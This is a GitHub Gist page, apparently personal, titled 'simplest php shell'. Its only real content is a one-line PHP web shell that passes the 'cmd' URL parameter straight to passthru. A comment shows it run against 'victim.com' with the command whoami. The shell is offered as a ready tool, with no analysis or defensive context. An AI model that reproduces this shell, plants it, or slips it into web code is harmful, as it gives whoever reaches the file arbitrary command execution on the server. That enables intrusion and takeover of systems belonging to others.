Created
August 13, 2020 14:04
-
-
Save enderphan94/022a90b1f7ad651a5d0d9d5716bd0a55 to your computer and use it in GitHub Desktop.
simplest php shell #php #shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php passthru($_GET['cmd']); ?> | |
#http://victim.com?cmd=whoami |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment